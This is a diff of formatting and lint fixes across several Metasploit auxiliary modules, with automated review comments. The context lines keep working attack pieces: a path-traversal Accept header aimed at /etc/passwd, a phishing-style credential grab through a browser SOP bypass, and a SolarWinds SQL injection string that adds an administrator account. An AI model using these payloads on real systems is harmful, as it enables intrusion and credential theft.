[ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q' ],
@@ -53,11 +52,12 @@ class MetasploitModule < Msf::Auxiliary
end
def get_accept_header_value(depth, file)
return (('../'*depth) + file + '{{').gsub('//', '/')
return (('../' * depth) + file + '{{').gsub('//', '/')
end
def check
return true if datastore['SkipCheck']
# Check if target file is absolute path
unless datastore['TARGET_FILE'].start_with? '/'
vprint_error "TARGET_FILE must be an absolute path (eg. /etc/passwd)."
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Auxiliary
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['ROUTE']),
'headers' => { 'Accept' => get_accept_header_value(datastore['DEPTH'], '/etc/passwd')}
'headers' => { 'Accept' => get_accept_header_value(datastore['DEPTH'], '/etc/passwd') }
})
if res.nil?
@@ -92,13 +92,12 @@ class MetasploitModule < Msf::Auxiliary
fail_with(Failure::BadConfig, 'TARGET_FILE must be an absolute path (eg. /etc/passwd).') unless datastore['TARGET_FILE'].start_with? '/'
print_status "Requesting file #{datastore['TARGET_FILE']}"
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['ROUTE']),
'headers' => { 'Accept' => get_accept_header_value(datastore['DEPTH'], datastore['TARGET_FILE'])}
'headers' => { 'Accept' => get_accept_header_value(datastore['DEPTH'], datastore['TARGET_FILE']) }
})
if res.nil?
@@ -3,47 +3,48 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::Format::Webarchive
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Mac OS X Safari file:// Redirection Sandbox Escape',
'Description' => %q{
Versions of Safari before 8.0.6, 7.1.6, and 6.2.6 are vulnerable to a
"state management issue" that allows a browser window to be navigated
to a file:// URL. By dropping and loading a malicious .webarchive file,
an attacker can read arbitrary files, inject cross-domain Javascript, and
silently install Safari extensions.
},
'License' => MSF_LICENSE,
'Author' => [
'joev' # discovery, module
],
'References' => [
['ZDI', '15-228'],
['CVE', '2015-1155'],
['URL', 'https://support.apple.com/en-us/HT204826']
],
'Platform' => 'osx',
'DisclosureDate' => '2014-01-16'
))
super(
update_info(
info,
'Name' => 'Mac OS X Safari file:// Redirection Sandbox Escape',
'Description' => %q{
Versions of Safari before 8.0.6, 7.1.6, and 6.2.6 are vulnerable to a
"state management issue" that allows a browser window to be navigated
to a file:// URL. By dropping and loading a malicious .webarchive file,
an attacker can read arbitrary files, inject cross-domain Javascript, and
silently install Safari extensions.
},
'License' => MSF_LICENSE,
'Author' => [
'joev' # discovery, module
],
'References' => [
['ZDI', '15-228'],
['CVE', '2015-1155'],
['URL', 'https://support.apple.com/en-us/HT204826']
],
'Platform' => 'osx',
'DisclosureDate' => '2014-01-16'
)
)
register_options([
OptString.new("URIPATH", [false, 'The URI to use for this exploit (default is random)']),
OptPort.new('SRVPORT', [true, "The local port to use for the FTP server", 8081]),
OptPort.new('HTTPPORT', [true, "The HTTP server port", 8080])
OptPort.new('SRVPORT', [true, "The local port to use for the FTP server", 8081]),
OptPort.new('HTTPPORT', [true, "The HTTP server port", 8080])
])
end
def lookup_lhost(c=nil)
def lookup_lhost(c = nil)
# Get the source address
if datastore['SRVHOST'] == '0.0.0.0'
Rex::Socket.source_address( c || '50.50.50.50')
Rex::Socket.source_address(c || '50.50.50.50')
else
datastore['SRVHOST']
end
@@ -145,7 +146,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("Sending directory list via data connection #{webarchive_size}")
month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
m = month_names[Time.now.month-1]
m = month_names[Time.now.month - 1]
d = Time.now.day
y = Time.now.year
@@ -212,7 +213,7 @@ class MetasploitModule < Msf::Auxiliary
# Handle the HTTP request and return a response. Code borrorwed from:
# msf/core/exploit/http/server.rb
#
def start_http(opts={})
def start_http(opts = {})
# Ensture all dependencies are present before initializing HTTP
use_zlib
@@ -227,7 +228,7 @@ class MetasploitModule < Msf::Auxiliary
opts = {
'ServerHost' => datastore['SRVHOST'],
'ServerPort' => datastore['HTTPPORT'],
'Comm' => comm
'Comm' => comm
}.update(opts)
# Start a new HTTP server
@@ -237,7 +238,7 @@ class MetasploitModule < Msf::Auxiliary
opts['ServerHost'],
datastore['SSL'],
{
'Msf' => framework,
'Msf' => framework,
'MsfExploit' => self,
},
opts['Comm'],
@@ -250,8 +251,8 @@ class MetasploitModule < Msf::Auxiliary
# provided.
uopts = {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
on_request_uri(cli, req)
},
'Path' => resource_uri
}.update(opts['Uri'] || {})
@@ -287,7 +288,7 @@ class MetasploitModule < Msf::Auxiliary
# Returns the configured (or random, if not configured) URI path
#
def resource_uri
path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8+rand(8))
path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8 + rand(8))
path = '/' + path if path !~ /^\//
datastore['URIPATH'] = path
return path
@@ -296,7 +297,7 @@ class MetasploitModule < Msf::Auxiliary
#
# Create an HTTP response and then send it
#
def send_response(cli, code, message='OK', html='')
def send_response(cli, code, message = 'OK', html = '')
proto = Rex::Proto::Http::DefaultProtocol
res = Rex::Proto::Http::Response.new(code, message, proto)
res['Content-Type'] = 'text/html'
@@ -309,7 +310,7 @@ class MetasploitModule < Msf::Auxiliary
# @return [String] filename where we are storing the data
def record_data(data, cli)
name = if data.is_a?(Hash) then data.keys.first else 'data' end
file = File.basename(name).gsub(/[^A-Za-z]/,'')
file = File.basename(name).gsub(/[^A-Za-z]/, '')
store_loot(
file, "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"
)
@@ -10,31 +10,31 @@ class MetasploitModule < Msf::Auxiliary
super(
update_info(
info,
'Name' => 'Samsung Internet Browser SOP Bypass',
'Description' => %q(
'Name' => 'Samsung Internet Browser SOP Bypass',
'Description' => %q{
This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the
Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices.
By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather
credentials via a fake pop-up.
),
'License' => MSF_LICENSE,
'Author' => [
},
'License' => MSF_LICENSE,
'Author' => [
'Dhiraj Mishra', # Original discovery, disclosure
'Tod Beardsley', # Metasploit module
'Jeffrey Martin' # Metasploit module
],
'References' => [
[ 'CVE', '2017-17692' ],
['URL', 'http://fr.0day.today/exploit/description/28434']
'References' => [
[ 'CVE', '2017-17692' ],
['URL', 'http://fr.0day.today/exploit/description/28434']
],
'DisclosureDate' => '2017-11-08',
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
'DefaultAction' => 'WebServer'
)
)
register_options([
register_options([
OptString.new('TARGET_URL', [
true,
'The URL to spoof origin from.',
@@ -47,14 +47,13 @@ class MetasploitModule < Msf::Auxiliary
])
])
register_advanced_options([
OptString.new('CUSTOM_JS', [
false,
"Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.",
''
register_advanced_options([
OptString.new('CUSTOM_JS', [
false,
"Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.",
''
])
])
])
end
def run
@@ -63,6 +62,7 @@ class MetasploitModule < Msf::Auxiliary
def evil_javascript
return datastore['CUSTOM_JS'] unless datastore['CUSTOM_JS'].blank?
js = <<-EOS
setTimeout(function(){
x.document.body.innerHTML='<h1>404 Error</h1>'+
@@ -95,10 +95,10 @@ class MetasploitModule < Msf::Auxiliary
<body onclick="go()">
#{datastore['CUSTOM_HTML']}
</body></html>
EOS
EOS
end
def store_cred(username,password)
def store_cred(username, password)
credential_data = {
origin_type: :import,
module_fullname: self.fullname,
@@ -124,7 +124,7 @@ class MetasploitModule < Msf::Auxiliary
print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}")
else
print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}")
store_cred(u,p)
store_cred(u, p)
end
end
@@ -9,14 +9,18 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Search Engine Domain Email Address Collector',
'Description' => %q{
super(
update_info(
info,
'Name' => 'Search Engine Domain Email Address Collector',
'Description' => %q{
This module uses Google, Bing and Yahoo to create a list of
valid email addresses for the target domain.
},
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE))
valid email addresses for the target domain.
},
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE
)
)
register_options(
[
@@ -26,15 +30,16 @@ class MetasploitModule < Msf::Auxiliary
OptBool.new('SEARCH_YAHOO', [ true, 'Enable Yahoo! as a backend search engine', true]),
OptString.new('OUTFILE', [ false, "A filename to store the generated email list"]),
])
]
)
register_advanced_options(
[
OptString.new('PROXY', [ false, "Proxy server to route connection. <host>:<port>",nil]),
OptString.new('PROXY_USER', [ false, "Proxy Server User",nil]),
OptString.new('PROXY_PASS', [ false, "Proxy Server Password",nil])
])
OptString.new('PROXY', [ false, "Proxy server to route connection. <host>:<port>", nil]),
OptString.new('PROXY_USER', [ false, "Proxy Server User", nil]),
OptString.new('PROXY_PASS', [ false, "Proxy Server Password", nil])
]
)
end
# Search google.com for email's of target domain
@@ -43,10 +48,10 @@ class MetasploitModule < Msf::Auxiliary
response = ""
emails = []
header = { 'User-Agent' => Rex::UserAgent.session_agent }
clnt = Net::HTTP::Proxy(@proxysrv,@proxyport,@proxyuser,@proxypass).new("www.google.com")
searches = ["100", "200","300", "400", "500"]
clnt = Net::HTTP::Proxy(@proxysrv, @proxyport, @proxyuser, @proxypass).new("www.google.com")
searches = ["100", "200", "300", "400", "500"]
searches.each { |num|
resp = clnt.get2("/search?hl=en&lr=&ie=UTF-8&q=%40"+targetdom+"&start=#{num}&sa=N&filter=0&num=100",header)
resp = clnt.get2("/search?hl=en&lr=&ie=UTF-8&q=%40" + targetdom + "&start=#{num}&sa=N&filter=0&num=100", header)
response << resp.body
}
print_status("Extracting emails from Google search results...")
@@ -63,12 +68,11 @@ class MetasploitModule < Msf::Auxiliary
response = ""
emails = []
header = { 'User-Agent' => Rex::UserAgent.session_agent }
clnt = Net::HTTP::Proxy(@proxysrv,@proxyport,@proxyuser,@proxypass).new("search.yahoo.com")
searches = ["1", "101","201", "301", "401", "501"]
clnt = Net::HTTP::Proxy(@proxysrv, @proxyport, @proxyuser, @proxypass).new("search.yahoo.com")
searches = ["1", "101", "201", "301", "401", "501"]
searches.each { |num|
resp = clnt.get2("/search?p=%40#{targetdom}&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=0&vf=all&vm=p&fl=0&fr=yfp-t-152&xargs=0&pstart=1&b=#{num}",header)
resp = clnt.get2("/search?p=%40#{targetdom}&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=0&vf=all&vm=p&fl=0&fr=yfp-t-152&xargs=0&pstart=1&b=#{num}", header)
response << resp.body
}
print_status("Extracting emails from Yahoo search results...")
response.gsub!(/<.?b?[>]*>/, "")
@@ -84,11 +88,11 @@ class MetasploitModule < Msf::Auxiliary
response = ""
emails = []
header = { 'User-Agent' => Rex::UserAgent.session_agent }
clnt = Net::HTTP::Proxy(@proxysrv,@proxyport,@proxyuser,@proxypass).new("www.bing.com")
clnt = Net::HTTP::Proxy(@proxysrv, @proxyport, @proxyuser, @proxypass).new("www.bing.com")
searches = 1
while searches < 201
begin
resp = clnt.get2("/search?q=%40#{targetdom}&first=#{searches.to_s}",header)
resp = clnt.get2("/search?q=%40#{targetdom}&first=#{searches.to_s}", header)
response << resp.body
rescue
end
@@ -112,15 +116,14 @@ class MetasploitModule < Msf::Auxiliary
def run
if datastore['PROXY']
@proxysrv,@proxyport = datastore['PROXY'].split(":")
@proxysrv, @proxyport = datastore['PROXY'].split(":")
@proxyuser = datastore['PROXY_USER']
@proxypass = datastore['PROXY_PASS']
else
@proxysrv,@proxyport = nil, nil
@proxysrv, @proxyport = nil, nil
end
print_status("Harvesting emails .....")
target = datastore['DOMAIN']
emails = []
@@ -8,14 +8,18 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Search Engine Subdomains Collector',
'Description' => %q(
This module can be used to gather subdomains about a domain
from Yahoo, Bing.
),
'Author' => [ 'Nixawk' ],
'License' => MSF_LICENSE))
super(
update_info(
info,
'Name' => 'Search Engine Subdomains Collector',
'Description' => %q{
This module can be used to gather subdomains about a domain
from Yahoo, Bing.
},
'Author' => [ 'Nixawk' ],
'License' => MSF_LICENSE
)
)
deregister_http_client_options
@@ -25,7 +29,8 @@ class MetasploitModule < Msf::Auxiliary
OptBool.new('IP_SEARCH', [ false, "Enable ip of subdomains to locate subdomains", true]),
OptBool.new('ENUM_BING', [ true, "Enable Bing Search Subdomains", true]),
OptBool.new('ENUM_YAHOO', [ true, "Enable Yahoo Search Subdomains", true])
])
]
)
end
def rhost_yahoo
@@ -85,14 +90,17 @@ class MetasploitModule < Msf::Auxiliary
'setlang' => 'en-us',
'first' => num,
'q' => dork
})
}
)
next unless resp && resp.code == 200
html = resp.get_html_document
matches = html.search('cite')
matches.each do |match|
result = uri2domain(match.text)
next unless result
result.to_s.downcase!
results << result
end
@@ -120,9 +128,11 @@ class MetasploitModule < Msf::Auxiliary
'pz' => 100,
'p' => dork,
'b' => num
})
}
)
next unless resp && resp.code == 200
html = resp.get_html_document
matches = html.search('span[@class=" fz-15px fw-m fc-12th wr-bw lh-15"]')
matches.each do |match|
@@ -130,6 +140,7 @@ class MetasploitModule < Msf::Auxiliary
result = result.split('/')[0]
result = result.split(':')[0]
next unless result
result.to_s.downcase!
results << result
end
@@ -150,20 +161,24 @@ class MetasploitModule < Msf::Auxiliary
results |= yahoo_search(dork) if datastore['ENUM_YAHOO']
return domains if results.nil? || results.empty?
results.each do |subdomain|
next if domains.include?(subdomain)
next unless valid_result?(target, subdomain)
print_good("#{dork} subdomain: #{subdomain}")
if ipv4
domains[subdomain] = [target]
else
ips = domain2ip(subdomain)
next if ips.empty?
domains[subdomain] = ips
ips.each { |ip| search_subdomains(ip) } if !ips.empty? && datastore['IP_SEARCH']
end
end
return if domains.empty?
report_note(host: target, type: 'Subdomains', update: :unique_data, data: domains)
end
+23 -22
@@ -6,24 +6,24 @@
class MetasploitModule < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'Shodan Honeyscore Client',
'Description' => %q{
This module uses the shodan API to check
if a server is a honeypot or not. The api
returns a score from 0.0 to 1.0. 1.0 being a honeypot.
A shodan API key is needed for this module to work properly.
super(
update_info(
info,
'Name' => 'Shodan Honeyscore Client',
'Description' => %q{
This module uses the shodan API to check
if a server is a honeypot or not. The api
returns a score from 0.0 to 1.0. 1.0 being a honeypot.
A shodan API key is needed for this module to work properly.
If you don't have an account, go here to register:
https://account.shodan.io/register
For more info on how their honeyscore system works, go here:
https://honeyscore.shodan.io/
},
'Author' =>
[ 'thecarterb' ], # Thanks to @rwhitcroft, @h00die and @wvu-r7 for the improvements and review!
'License' => MSF_LICENSE,
'References' =>
[
If you don't have an account, go here to register:
https://account.shodan.io/register
For more info on how their honeyscore system works, go here:
https://honeyscore.shodan.io/
},
'Author' => [ 'thecarterb' ], # Thanks to @rwhitcroft, @h00die and @wvu-r7 for the improvements and review!
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://honeyscore.shodan.io/']
]
)
@@ -33,7 +33,8 @@ class MetasploitModule < Msf::Auxiliary
[
OptString.new('TARGET', [true, 'The target to get the score of']),
OptString.new('SHODAN_APIKEY', [true, 'The SHODAN API key'])
])
]
)
end
def print_score(score)
@@ -60,9 +61,9 @@ class MetasploitModule < Msf::Auxiliary
cli = Rex::Proto::Http::Client.new('api.shodan.io', 443, {}, true)
cli.connect
req = cli.request_cgi({
'uri' => "/labs/honeyscore/#{tgt}?key=#{key}",
'uri' => "/labs/honeyscore/#{tgt}?key=#{key}",
'method' => 'GET'
})
})
res = cli.send_recv(req)
cli.close
if res.nil?
@@ -74,7 +75,7 @@ class MetasploitModule < Msf::Auxiliary
return
end
score = res.body.to_f # Change the score to a float to be able to determine value in the checks
score = res.body.to_f # Change the score to a float to be able to determine value in the checks
if score == 0
print_error("#{tgt} is not a honeypot")
@@ -86,7 +87,7 @@ class MetasploitModule < Msf::Auxiliary
print_good("#{tgt} is probably a honeypot")
elsif score == 1.0
print_good("#{tgt} is definitely a honeypot")
else # We shouldn't ever get here as the previous checks should catch an unexpected response
else # We shouldn't ever get here as the previous checks should catch an unexpected response
print_error('An unexpected error occurred.')
return
end
+38 -38
@@ -11,26 +11,27 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Shodan Search',
'Description' => %q{
This module uses the Shodan API to search Shodan. Accounts are free
and an API key is required to use this module. Output from the module
is displayed to the screen and can be saved to a file or the MSF database.
NOTE: SHODAN filters (i.e. port, hostname, os, geo, city) can be used in
queries, but there are limitations when used with a free API key. Please
see the Shodan site for more information.
Shodan website: https://www.shodan.io/
API: https://developer.shodan.io/api
Filters: https://www.shodan.io/search/filters
Facets: https://www.shodan.io/search/facet (from the scrollbox)
},
'Author' =>
[
super(
update_info(
info,
'Name' => 'Shodan Search',
'Description' => %q{
This module uses the Shodan API to search Shodan. Accounts are free
and an API key is required to use this module. Output from the module
is displayed to the screen and can be saved to a file or the MSF database.
NOTE: SHODAN filters (i.e. port, hostname, os, geo, city) can be used in
queries, but there are limitations when used with a free API key. Please
see the Shodan site for more information.
Shodan website: https://www.shodan.io/
API: https://developer.shodan.io/api
Filters: https://www.shodan.io/search/filters
Facets: https://www.shodan.io/search/facet (from the scrollbox)
},
'Author' => [
'John H Sawyer <john[at]sploitlab.com>', # InGuardians, Inc.
'sinn3r' # Metasploit-fu plus other features
'sinn3r' # Metasploit-fu plus other features
],
'License' => MSF_LICENSE
'License' => MSF_LICENSE
)
)
@@ -155,7 +156,7 @@ class MetasploitModule < Msf::Auxiliary
)
print_status("Total: #{results[first_page]['total']} on #{tpages} " \
'pages. Showing facets')
facet = results.dig(first_page,'facets')
facet = results.dig(first_page, 'facets')
facet.each do |name, list|
list.each do |f|
facets_tbl << [name.to_s, (f['value']).to_s, (f['count']).to_s]
@@ -172,18 +173,19 @@ class MetasploitModule < Msf::Auxiliary
if results[first_page]['total'] > 100
page = 1
while page < maxpage
page_result = shodan_query(apikey, query, facets, page+1)
page_result = shodan_query(apikey, query, facets, page + 1)
if page_result['matches'].nil?
next
end
results[page] = page_result
page += 1
end
end
# Save the results to this table
tbl = Rex::Text::Table.new(
'Header' => 'Search Results',
'Indent' => 1,
'Header' => 'Search Results',
'Indent' => 1,
'Columns' => ['IP:Port', 'City', 'Country', 'Hostname']
)
@@ -191,36 +193,34 @@ class MetasploitModule < Msf::Auxiliary
regex = datastore['REGEX'] if datastore['REGEX']
results.each do |page|
page['matches'].each do |host|
city = host.dig('location','city') || 'N/A'
ip = host.fetch('ip_str', 'N/A')
city = host.dig('location', 'city') || 'N/A'
ip = host.fetch('ip_str', 'N/A')
port = host.fetch('port', '')
country = host.dig('location','country_name') || 'N/A'
hostname = host.dig('hostnames',0)
country = host.dig('location', 'country_name') || 'N/A'
hostname = host.dig('hostnames', 0)
data = host.dig('data')
report_host(:host => ip,
:name => hostname,
report_host(:host => ip,
:name => hostname,
:comments => 'Added from Shodan',
:info => host.dig('info')
) if datastore['DATABASE']
:info => host.dig('info')) if datastore['DATABASE']
report_service(:host => ip,
:port => port,
:info => 'Added from Shodan'
) if datastore['DATABASE']
:port => port,
:info => 'Added from Shodan') if datastore['DATABASE']
if ip =~ regex ||
city =~ regex ||
country =~ regex ||
hostname =~ regex ||
data =~ regex
city =~ regex ||
country =~ regex ||
hostname =~ regex ||
data =~ regex
# Unfortunately we cannot display the banner properly,
# because it messes with our output format
tbl << ["#{ip}:#{port}", city, country, hostname]
end
end
end
#Show data and maybe save it if needed
# Show data and maybe save it if needed
print_line()
print_line("#{tbl}")
save_output(tbl) if datastore['OUTFILE']
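Review bot: The `next` inside `while page < maxpage` never advances `page` when `page_result['matches']` is nil, so one page without matches re-issues the same Shodan query for that page indefinitely; either stop paginating there (`break` in place of `next`) or advance the counter before skipping. In the facets hunk, `facet = results.dig(first_page, 'facets')` is followed by `facet.each`, which raises NoMethodError when the response carries no `facets` key; `facet&.each do |name, list|` keeps the existing behaviour for present facets. The enclosing `run` method starts and ends outside these hunks.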
+19 -16
@@ -10,25 +10,27 @@ class MetasploitModule < Msf::Auxiliary
HttpFingerprint = { :pattern => [ /SNARE/ ] }
def initialize(info = {})
super(update_info(info,
'Name' => 'Snare Lite for Windows Registry Access',
'Description' => %q{
super(
update_info(
info,
'Name' => 'Snare Lite for Windows Registry Access',
'Description' => %q{
This module uses the Registry Dump feature of the Snare Lite
for Windows service on 6161/TCP to retrieve the Windows registry.
The Dump Registry functionality is unavailable in Snare Enterprise.
for Windows service on 6161/TCP to retrieve the Windows registry.
The Dump Registry functionality is unavailable in Snare Enterprise.
Note: The Dump Registry functionality accepts only one connected
client at a time. Requesting a large key/hive will cause the service
to become unresponsive until the server completes the request.
},
'Platform' => 'win',
'Author' => [ 'bcoles' ],
'License' => MSF_LICENSE,
'References' =>
[
Note: The Dump Registry functionality accepts only one connected
client at a time. Requesting a large key/hive will cause the service
to become unresponsive until the server completes the request.
},
'Platform' => 'win',
'Author' => [ 'bcoles' ],
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://www.intersectalliance.com/wp-content/uploads/user_guides/Guide_to_Snare_for_Windows-4.2.pdf' ]
]
))
)
)
register_options(
[
@@ -38,7 +40,8 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('REG_DUMP_KEY', [ false, 'Retrieve this registry key and all sub-keys', 'HKLM\\HARDWARE\\DESCRIPTION\\System' ]),
OptBool.new('REG_DUMP_ALL', [false, 'Retrieve the entire Windows registry', false]),
OptInt.new('TIMEOUT', [true, 'Timeout in seconds for downloading each registry key/hive', 300])
])
]
)
end
def run
@@ -7,23 +7,24 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Solarwinds Orion AccountManagement.asmx GetAccounts Admin Creation',
'Description' => %q{
This module exploits a stacked SQL injection in order to add an administrator user to the
SolarWinds Orion database.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry' #discovery/metasploit module
super(
update_info(
info,
'Name' => 'Solarwinds Orion AccountManagement.asmx GetAccounts Admin Creation',
'Description' => %q{
This module exploits a stacked SQL injection in order to add an administrator user to the
SolarWinds Orion database.
},
'License' => MSF_LICENSE,
'Author' => [
'Brandon Perry' # discovery/metasploit module
],
'References' =>
[
'References' => [
['CVE', '2014-9566']
],
'DisclosureDate' => '2015-02-24'
))
'DisclosureDate' => '2015-02-24'
)
)
register_options(
[
@@ -31,12 +32,11 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('TARGETURI', [ true, "Base Orion directory path", '/']),
OptString.new('USERNAME', [true, 'The username to authenticate as', 'Guest']),
OptString.new('PASSWORD', [false, 'The password to authenticate with', ''])
])
]
)
end
def login (username,password)
def login(username, password)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'Orion', 'Login.aspx')
})
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Auxiliary
'uri' => normalize_uri(target_uri.path, 'Orion', 'Services', 'AccountManagement.asmx' '/GetAccounts'),
'method' => 'POST',
'vars_get' => {
'sort' => 'Accounts.AccountID', #also vulnerable
'sort' => 'Accounts.AccountID', # also vulnerable
'dir' => "ASC;insert into accounts values ('#{username}', '127-510823478-74417-8', '/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==', 'Feb 1 2100 12:00AM', 'Y', '#{username}', 1, '', '', 1, -1, 8, -1, 4, 0, 0, 0, 0, 0, 0, 'Y', 'Y', 'Y', 'Y', 'Y', '', '', 0, 0, 0, 'N', 'Y', '', 1, '', 0, '');"
},
'data' => '{"accountId":""}',
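Review bot: `'AccountManagement.asmx' '/GetAccounts'` on the `'uri'` line relies on implicit adjacent-literal concatenation, which reads like a missing comma and is what RuboCop's Lint/ImplicitStringConcatenation exists to catch. Make the intent explicit with a single literal, `normalize_uri(target_uri.path, 'Orion', 'Services', 'AccountManagement.asmx/GetAccounts')`, which yields the same string. The method containing this request starts before the hunk and continues after it.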
+36 -32
@@ -33,10 +33,10 @@ class MetasploitModule < Msf::Auxiliary
cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS')
cli.connect
req = cli.request_cgi({
'uri' => uri,
'agent' => user_agent,
'method' => 'GET',
'vars_get' => params
'uri' => uri,
'agent' => user_agent,
'method' => 'GET',
'vars_get' => params
})
res = cli.send_recv(req)
cli.close
@@ -46,6 +46,7 @@ class MetasploitModule < Msf::Auxiliary
@current_assessments = res.headers['X-Current-Assessments']
r = JSON.load(res.body)
fail InvocationError, "API returned: #{r['errors']}" if r.key?('errors')
return r
end
@@ -66,7 +67,7 @@ class MetasploitModule < Msf::Auxiliary
end
def report_unused_attrs(type, unused_attrs)
unused_attrs.each do | attr |
unused_attrs.each do |attr|
# $stderr.puts "#{type} request returned unknown parameter #{attr}"
end
end
@@ -462,24 +463,25 @@ class MetasploitModule < Msf::Auxiliary
end
def initialize(info = {})
super(update_info(info,
'Name' => 'SSL Labs API Client',
'Description' => %q{
super(
update_info(
info,
'Name' => 'SSL Labs API Client',
'Description' => %q{
This module is a simple client for the SSL Labs APIs, designed for
SSL/TLS assessment during a penetration test.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Denis Kolegov <dnkolegov[at]gmail.com>',
'Francois Chagnon' # ssllab.rb author (https://github.com/Shopify/ssllabs.rb)
],
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true,
}
))
'License' => MSF_LICENSE,
'Author' => [
'Denis Kolegov <dnkolegov[at]gmail.com>',
'Francois Chagnon' # ssllab.rb author (https://github.com/Shopify/ssllabs.rb)
],
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
}
)
)
register_options(
[
OptString.new('HOSTNAME', [true, 'The target hostname']),
@@ -487,7 +489,8 @@ class MetasploitModule < Msf::Auxiliary
OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', true]),
OptBool.new('GRADE', [true, 'Output only the hostname: grade', false]),
OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', true])
])
]
)
end
def report_good(line)
@@ -734,6 +737,7 @@ class MetasploitModule < Msf::Auxiliary
def output_common_info(r)
return unless r
print_status "Host: #{r.host}"
r.endpoints.each do |e|
@@ -743,6 +747,7 @@ class MetasploitModule < Msf::Auxiliary
def output_result(r, grade)
return unless r
output_common_info(r)
if grade
output_grades_only(r)
@@ -847,16 +852,15 @@ class MetasploitModule < Msf::Auxiliary
sleep delay
r = api.analyse(host: hostname, all: 'done')
end
rescue RequestRateTooHigh
print_error "Request rate is too high, please slow down"
rescue InternalError
print_error "Service encountered an error, sleep 5 minutes"
rescue ServiceNotAvailable
print_error "Service is not available, sleep 15 minutes"
rescue ServiceOverloaded
print_error "Service is overloaded, sleep 30 minutes"
rescue
print_error "Invalid parameters"
rescue RequestRateTooHigh
print_error "Request rate is too high, please slow down"
rescue InternalError
print_error "Service encountered an error, sleep 5 minutes"
rescue ServiceNotAvailable
print_error "Service is not available, sleep 15 minutes"
rescue ServiceOverloaded
print_error "Service is overloaded, sleep 30 minutes"
rescue
print_error "Invalid parameters"
end
end
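Review bot: `r = JSON.load(res.body)` parses a response from a remote service with `JSON.load`, which in older versions of the json gem defaults to `create_additions` and can therefore instantiate classes named by a `json_class` key in the input; for data you do not control, `r = JSON.parse(res.body)` is the appropriate call. The line below it uses `fail`, which RuboCop's Style/SignalException rewrites to `raise InvocationError, "API returned: #{r['errors']}" if r.key?('errors')`. The bare `rescue` closing the last hunk prints "Invalid parameters" for every StandardError, including connection failures, which hides the real cause; rescuing the expected error class or including `e.message` in the output would help. The methods containing these lines start outside their hunks.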
+34 -31
@@ -8,23 +8,26 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'TeamTalk Gather Credentials',
'Description' => %q{
This module retrieves user credentials from BearWare TeamTalk.
super(
update_info(
info,
'Name' => 'TeamTalk Gather Credentials',
'Description' => %q{
This module retrieves user credentials from BearWare TeamTalk.
Valid administrator credentials are required.
Valid administrator credentials are required.
This module has been tested successfully on TeamTalk versions
5.2.2.4885 and 5.2.3.4893.
},
'Author' => 'bcoles',
'References' =>
[
This module has been tested successfully on TeamTalk versions
5.2.2.4885 and 5.2.3.4893.
},
'Author' => 'bcoles',
'References' => [
# Protocol documentation
['URL', 'https://github.com/BearWare/TeamTalk5/blob/master/ttphpadmin/tt5admin.php']
],
'License' => MSF_LICENSE))
'License' => MSF_LICENSE
)
)
register_options [
Opt::RPORT(10333),
OptString.new('USERNAME', [true, 'The username for TeamTalk', 'admin']),
